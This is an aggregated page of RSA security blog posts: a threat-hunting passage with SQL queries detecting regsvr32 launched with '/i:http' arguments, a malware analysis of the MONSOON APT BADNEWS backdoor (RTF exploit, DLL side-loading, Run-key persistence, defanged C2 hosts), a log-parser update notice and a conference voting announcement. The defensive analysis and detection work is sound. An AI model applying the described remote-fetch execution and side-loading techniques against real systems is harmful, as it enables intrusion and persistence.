We can see the request to '' over SSL and then the connection to 'meubackup.terra[.]com[.]br'.  This downloaded a 1.4mb file based on the network traffic.  Even though this is an SSL connection, we can still see the meta data about that session.  I can now go and find the file where the script told us it would be.  In the C:\Users\Public\Administrator folder.



Currently this could be picked up with the IIOC "Runs mshta with javascript arguments".


Another we could create is slightly different than one out of the box to cover both HTTP and HTTPS connections.  



--Runs_REGSVR32_HTTP.sql Runs REGSVR32.EXE with HTTP argument 

/* DB Query


SELECT mn.MachineName, se.EventUTCTime, sfn.Filename, se.FileName_Target, se.Path_Target, se.LaunchArguments_Target, sla.LaunchArguments



[dbo].[WinTrackingEvents_P0] AS [se] WITH(NOLOCK) -- Also try P1
INNER JOIN [dbo].[MachineModulePaths] AS [mp] WITH(NOLOCK) ON ([mp].[PK_MachineModulePaths] = [se].[FK_MachineModulePaths])
INNER JOIN [dbo].[FileNames] AS [sfn] WITH(NOLOCK) ON ([sfn].[PK_FileNames] = [mp].[FK_FileNames])
INNER JOIN [dbo].[machines] AS [mn] WITH(NOLOCK) ON [mn].[PK_Machines] = [se].[FK_Machines]
INNER JOIN [dbo].[LaunchArguments] AS [sla] WITH(NOLOCK) ON [sla].[PK_LaunchArguments] = [se].[FK_LaunchArguments__SourceCommandLine]



[se].[BehaviorProcessCreateProcess] = 1 AND
[se].FileName_Target = N'regsvr32.exe' AND
[se].LaunchArguments_Target LIKE N'%/i:http%'


--ORDER BY se.EventUTCTime desc
ORDER BY mn.MachineName desc




--,[se].[PK_WinTrackingEvents] AS [FK_mocSentinelEvents]  

-- If you are using, remove the comment dash above


[dbo].[WinTrackingEventsCache] AS [se] WITH(NOLOCK)



[se].[BehaviorProcessCreateProcess] = 1 AND
[se].FileName_Target = N'regsvr32.exe' AND
[se].LaunchArguments_Target LIKE N'%/i:http%'





I hope you find this useful and as always, happy hunting.



On July 6, 2017, RSA FirstWatch noted renewed MONSOON APT campaign activity submitted (from a community user in India) to Virus Total.  The submission in this case was an email attachment, Free_Hosting.doc, a Rich Text Format (RTF) document that attempts to exploit CVE-2015-1641. (Note: For a technical walk-through of RTF and its commonly exploited vulnerabilities, we recommend readers take a look at this post by RSA Engineering's Kevin Douglas.)


 monsoon badnews rtf


The RTF file drops BADNEWS, a backdoor facilitated by a signed Java executable that uses a DLL side-loading technique to evade security detection/prevention.  (A similar technique is employed by PlugX, a backdoor that is well documented by past RSA Research efforts.)  To accomplish this, the RTF writes out several executables, which create MicroScMgmt.exe and jli.dll in C:\Users\analyst\AppData\Roaming\Microsoft and modifies the current users RUN key to add persistence. 


monsoon badnews exe


monsoon badnews exe


The executable also reaches out to 'GET /images/' from www.samanthvisser[.]com, hosted at 162[.]255[.]116[.]10 to retrieve a decoy Free_Hosting.doc to distract users.


monsoon badnews rtf

monsoon RTF exploit


Meanwhile, MicroScMgmt.exe (md5: BA79F3D12D455284011F114E3452A163) is actually a signed copy of Java Platform SE 6 U39 that side loads (essentially calling an execution path for) jli.dll from C:\Users\analyst\AppData\Roaming\Microsoft in the place of Microsoft's msvcr71.dll from the Windows\System32 folder.  Backdoor established.


 monsoon badnews exe

monsoon badnews exe


Based on these observations, this activity from early July appears consistent with recent Monsoon campaigns as documented by both Fortinet (part1 and part2) and Forcepoint.  Nice screen shot courtesy of Vitali Kremez, @VK_Intel, who captured our executable in action.


monsoon badnews exe


Upon infection, initial Command and Control (C2) was observed via an unsolicited 'HTTP POST /6031170831643635.xml' out to feed43[.]com, a domain previously tied to Monsoon (part1 of the Fortinet reports 'hxxp://') and believed to host encrypted data that contains the actual C2 server. 


monsoon badnews c2


We also observed suspected outbound C2 via 'HTTP POST /1bc29b36f623ba82aaf672/435dfa34fasdf3.php' out direct to IP address 91[.]92[.]136[.]20, likely also passing encrypted (or obfuscated) content.  Also noted outbound communications to en[.]wikipedia[.]org, but the purpose of this connection remains unclear (although possibly relates to past actor usage of forums).


monsoon badnews c2


With regard to NetWitness detection of Monsoon APT's delivery of BADNEWS, note the behavioral indicators captured in the meta below.


netwitness monsoon apt badnews

netwitness monsoon apt badnews

netwitness monsoon apt badnews


NetWitness Endpoint (i.e., ECAT) was also able to identify this activity rather easily by monitoring Office applications, WINWORD in the case of BADNEWS, for writing any executables.  Indicators of compromise (IOCs) from ECAT are below.


ecat monsoon badnews iocs


Additionally, all observed MONSOON BADNEWS domains and IPs have been added to the FirstWatch C2 Domains and IPs feeds and should be available via RSA Live.


Thanks to Christopher Ahearn and Ahmed Sonbol for their help with this analysis.



RSA FirstWatch banner

The RSA NetWitness Log Parsing team has reviewed the Top 50 Log Parsers that generate the most number of incoming “Unknown Message Defect” support cases.


Summary for Top 50 Event Sources


# of Log Parsers Released on Live

Number of Event Sources - IMPROVED & RELEASED


38 (as of 21 Jun 2017)

Number of Event Sources - CANNOT BE IMPROVED


Not Applicable

Final Count



These enhancements are part of a strategic initiative to drive improvements to Log Parsers.

Benefits from these improvements result in:

  • Fewer Unknown Messages
  • Improved Device Discovery
  • Better Adaptability to newer versions of an Event Source
  • Reduced Parser Maintenance


To take advantage of these improvements, you will need to download the latest versions of the Log Parsers listed below from the NetWitness Live Portal.



A Look into the Details

50 Log Parsers were identified as the ones that were causing almost 80% of ALL the incoming requests for fixing unknown messages & minor defects. All of them were reviewed in detail and checked for scope of adding any improvements.


Design Considerations

The team investigated the reasons behind generation of high volume of incoming unknown message tickets.


The factors considered were:

  • Common patterns seen across all unknown message tickets for a particular event source.
  • Certain Log formats that generate Unknown messages
  • Were these logs result of a Configuration Error?
  • Were these logs generated after upgrading to a newer version of the Event Source?
  • Backwards Compatibility Impact of the modifications:
    • If the solution is re-designing the parser in any way (re-writing a few or all message definitions or Header definitions)  the 'after-effect' on the Meta Key Footprint should be nothing to very minimal.


Log Parsers were updated/Re-designed only If the Backwards Compatibility impact from above parameters were negligible.

Here is a brief highlight of the design improvements-


  • The Log Parsers have been redesigned to identify all events generated by the event source. They have been made future proof as much as possible to parse newer events.
  • Log Parsers which parse logs with structured formats that use tag=value functionality, have been updated to accommodate New/Unknown tags, which significantly reduces the number of unknown messages.
  • These updates were also done to cover as many new changes as possible that may be introduced in Newer versions of the product.


Here is the list of 38 Log Parsers that were Improved and released to NetWitness Live –



Log Parser Name


Bit9-Bit9 Security Platform


Blue Coat-Blue Coat ProxySG SGOS


Check Point-Check Point Security Suite, IPS-1


Cisco-Cisco Adaptive Security Appliance


Cisco-Cisco IronPort Email Security Appliance


Cisco-Cisco IronPort Web Security Appliance (WSA)


Cisco-Cisco Secure Access Control Server & Cisco-Cisco Identity Services Engine


Cisco-Cisco Secure IDS or IPS


Cisco-Cisco Wireless LAN Controller (2100 Series and 4400 Series)


F5-F5 Big-IP Application Security Manager


FireEye-FireEye Web Malware Protection System


Fortinet-Fortinet FortiGate




IBM-IBM DB2 Universal Database


IBM-IBM iSeries AS400


IBM-IBM ISS SiteProtector


IBM-IBM WebSphere


Juniper-Juniper Networks SSL VPN


Lancope-Lancope StealthWatch


McAfee-McAfee Email Gateway (formerly known as CipherTrust IronMail)


McAfee-McAfee Network Security Platform (Intrushield)


Microsoft-Microsoft Exchange Server


Microsoft-Microsoft Internet Information Services


Microsoft-Microsoft SQL Server


Microsoft-Microsoft Windows using Eventing Collection


Microsoft-Microsoft Windows using: Adiscon Event Reporter


Microsoft-Microsoft Windows using: Intersect Alliance SNARE


Oracle-Oracle Access Manager


Oracle-Oracle Database


Oracle-Sun Solaris




Trend Micro-Trend Micro Control Manager


Tripwire-Tripwire Enterprise


UnboundID - UnboundID Identity Data Store


Vmware-VMware ESX/ESXi


Vmware-VMware vCenter Server


Voltage SecureData


Websense-Websense Web Security



Here is the list of 12 Log Parsers that cannot be improved further -



Log Parser Name


Check Point-Check Point IPSO (nokiaipso)


Cisco-Cisco Router/Switch


Citrix-Citrix NetScaler


F5-F5 Big IP (Local Traffic Manager)


Infoblox-Infoblox NIOS


Juniper-Juniper Networks JUNOS


McAfee-McAfee ePolicy Orchestrator


McAfee-McAfee Web Gateway


Palo Alto Networks-Palo Alto Networks Enterprise Firewall


Red Hat Linux (RHEL)


RSA Authentication Manager/UCM  (rsaacesrv)


Symantec-Symantec Endpoint Protection


Most of these contain highly unstructured Log formats. Due to several Backwards Compatibility / Performance impact issues, these couldn't be improved.


Please note that these 12 Log Parsers are expected to generate unknown messages. The team depends on the incoming support requests for updating these parsers. Once these requests are received, the team will get them updated as soon as possible.



The RSA NetWitness Log Parsing team will be closely monitoring any incoming requests for the improved Log Parsers and further improve them as applicable. They will continue to power these improvements to other Supported Log parsers in the library.

RSA Charge 2017’s ‘Call for Speakers’ resulted in an unprecedented number of abstract submissions across all RSA product solutions – RSA Archer Suite, RSA NetWitness Suite, RSA SecurID Suite (including RSA Identity Governance & Lifecycle), and RSA Fraud & Risk Intelligence. The submissions from RSA customers and partners included the sharing of first-hand knowledge, advice, ideas, experiences, case studies, and even war stories that submitters wanted to share with their RSA product peers at the Charge event in October.


Though the RSA Charge Program Selection Committee is thrilled by the high caliber of submissions, the Committee now faces the hard task of whittling down the list of submissions to 100 across all RSA products. Though no final decisions have yet been made, the Committee noticed that there were many submissions that had similar titles and themes, so they decided to allow you the opportunity ‘voice your choice’ from a small, random subset from the abstracts received.


And, for the first time, with a registered RSA Link account, you can vote on Tracks across the entire RSA product portfolio. That’s right, you can vote on any of the product Tracks listed, but you can only vote once ‘per abstract.’


So let your voice be heard - this is your chance to 'vote your choice' and have a say in this year's RSA Charge 2017 Agenda. To vote, simply click on the Proposal Abstracts and cast your vote across all RSA Product Tracks.


Thank you for the amazing ‘Call for Speakers’ submissions for RSA Charge 2017 – it’s going to be an event you will not want to miss. If you haven’t registered for RSA Charge 2017, be sure to do so today!  


Filter Blog

By date: By tag: